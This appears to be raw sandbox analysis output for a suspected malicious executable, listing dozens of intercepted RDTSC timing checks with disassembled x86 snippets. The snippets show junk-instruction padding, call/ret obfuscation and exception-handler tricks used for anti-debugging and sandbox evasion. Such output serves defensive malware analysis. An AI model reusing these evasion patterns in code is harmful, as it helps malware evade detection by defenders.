              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80515E second address: 80517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEF0C6C7669h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80517D second address: 805181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805181 second address: 805185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835307 second address: 83530D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83530D second address: 835316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835316 second address: 83531A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83531A second address: 835332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7664h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835332 second address: 835338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835617 second address: 83562C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Bh 0x00000007 jo 00007FEF0C6C7672h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83562C second address: 835656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E736h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FEF0C74E738h 0x00000011 jg 00007FEF0C74E732h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835A8D second address: 835A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838E48 second address: 838E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841244 second address: 841265 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FEF0C6C7656h 0x00000011 jmp 00007FEF0C6C765Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841265 second address: 841272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FEF0C74E726h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8405FC second address: 840603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840603 second address: 84060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEF0C74E726h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840789 second address: 84079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8408EE second address: 8408F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8408F2 second address: 8408F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840D96 second address: 840DC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c jmp 00007FEF0C74E72Ch 0x00000011 jnl 00007FEF0C74E72Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FEF0C74E726h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840DC6 second address: 840DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F44 second address: 840F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F48 second address: 840F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FEF0C6C7677h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8410C8 second address: 8410D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E72Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8410D8 second address: 8410E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEF0C6C7656h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84302F second address: 843033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843033 second address: 84305E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007FEF0C6C7667h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84305E second address: 843064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843064 second address: 8430DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEF0C6C7656h 0x00000009 jc 00007FEF0C6C7656h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jmp 00007FEF0C6C7665h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FEF0C6C765Dh 0x00000024 pop eax 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FEF0C6C7658h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f je 00007FEF0C6C7659h 0x00000045 movsx edi, bx 0x00000048 push 0646AF86h 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 ja 00007FEF0C6C7656h 0x00000056 pop edi 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8434F7 second address: 8434FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843C0B second address: 843C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8441B4 second address: 8441BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844232 second address: 844236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 844236 second address: 844290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FEF0C74E728h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 movsx esi, bx 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEF0C74E739h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845103 second address: 845109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8461D4 second address: 846229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FEF0C74E72Ah 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 nop 0x00000013 jmp 00007FEF0C74E734h 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D39C2h] 0x00000020 push 00000000h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FEF0C74E739h 0x00000028 push eax 0x00000029 pushad 0x0000002a jo 00007FEF0C74E72Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 846229 second address: 846235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FEF0C6C7656h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 846235 second address: 846239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 847518 second address: 84751D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84751D second address: 847523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 847523 second address: 847527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8475EA second address: 8475F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 848B06 second address: 848B0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8495B5 second address: 84962C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FEF0C74E726h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FEF0C74E728h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1CCCh] 0x00000031 xor dword ptr [ebp+12478FBEh], esi 0x00000037 mov esi, dword ptr [ebp+122D3932h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FEF0C74E728h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 sub edi, 0E3BC857h 0x0000005f push 00000000h 0x00000061 mov esi, dword ptr [ebp+12477078h] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84962C second address: 849636 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84B4C0 second address: 84B4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84B4C4 second address: 84B4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84B4D0 second address: 84B4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E734h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84B4EA second address: 84B503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jl 00007FEF0C6C7656h 0x0000000e jmp 00007FEF0C6C765Ah 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84B503 second address: 84B51B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEF0C74E72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FEF0C74E726h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84CDB6 second address: 84CDBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84D355 second address: 84D35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E2D2 second address: 84E2DC instructions: 0x00000000 rdtsc 0x00000002 js 00007FEF0C6C765Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84D4DE second address: 84D53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEF0C74E732h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FEF0C74E72Bh 0x00000013 or edi, 2EA59BCAh 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 sbb di, 91C0h 0x0000002d mov eax, dword ptr [ebp+122D1345h] 0x00000033 mov edi, dword ptr [ebp+122D3B32h] 0x00000039 or dword ptr [ebp+122D19E8h], ecx 0x0000003f push FFFFFFFFh 0x00000041 and edi, 20A1FA0Dh 0x00000047 push eax 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pop edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E2DC second address: 84E35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FEF0C6C7668h 0x0000000e mov ebx, 3B7585E1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FEF0C6C7658h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2735h] 0x00000035 call 00007FEF0C6C7667h 0x0000003a mov dword ptr [ebp+122D20C2h], ebx 0x00000040 pop ebx 0x00000041 mov ebx, 33FC6440h 0x00000046 push 00000000h 0x00000048 mov ebx, edx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jns 00007FEF0C6C765Ch 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F370 second address: 84F37A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F37A second address: 84F3FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FEF0C6C7658h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 adc bx, F1B9h 0x0000002d push 00000000h 0x0000002f mov ebx, dword ptr [ebp+12478E45h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FEF0C6C7658h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 jmp 00007FEF0C6C7668h 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 jl 00007FEF0C6C7658h 0x0000005e pushad 0x0000005f popad 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E49B second address: 84E4A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E4A1 second address: 84E4AB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEF0C6C765Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E4AB second address: 84E537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FEF0C74E728h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add edi, dword ptr [ebp+122D3A1Eh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov di, 7B24h 0x0000003d jmp 00007FEF0C74E72Ch 0x00000042 mov eax, dword ptr [ebp+122D05F1h] 0x00000048 pushad 0x00000049 sbb ecx, 19CEB426h 0x0000004f xor dword ptr [ebp+122D295Fh], edi 0x00000055 popad 0x00000056 push FFFFFFFFh 0x00000058 mov edi, dword ptr [ebp+122D1E60h] 0x0000005e nop 0x0000005f jmp 00007FEF0C74E733h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 js 00007FEF0C74E72Ch 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F592 second address: 84F5B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F5B0 second address: 84F5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8516B4 second address: 8516B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F5B6 second address: 84F5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84F5BC second address: 84F649 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov bx, cx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FEF0C6C7658h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, 9F00h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov bx, 12CAh 0x00000040 mov eax, dword ptr [ebp+122D13CDh] 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007FEF0C6C7658h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 push FFFFFFFFh 0x00000062 push edi 0x00000063 mov ebx, dword ptr [ebp+122D371Eh] 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007FEF0C6C7662h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85278F second address: 8527A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEF0C74E733h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 851904 second address: 851909 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85298E second address: 852994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 854857 second address: 85485D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8575E0 second address: 85762B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FEF0C74E72Dh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FEF0C74E728h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2273h], ecx 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D186Bh], ebx 0x00000034 push 00000000h 0x00000036 xchg eax, esi 0x00000037 je 00007FEF0C74E730h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 857817 second address: 85781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8599D2 second address: 8599F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEF0C74E738h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85C73A second address: 85C76A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FEF0C6C7658h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007FEF0C6C765Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A9AA second address: 85A9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FEF0C74E726h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85C76A second address: 85C7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jo 00007FEF0C6C7656h 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FEF0C6C7658h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 sbb di, 1EFAh 0x0000002d mov dword ptr [ebp+124770FCh], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D1F13h] 0x0000003b push 00000000h 0x0000003d mov edi, 04DE98FCh 0x00000042 push eax 0x00000043 push esi 0x00000044 pushad 0x00000045 jnp 00007FEF0C6C7656h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
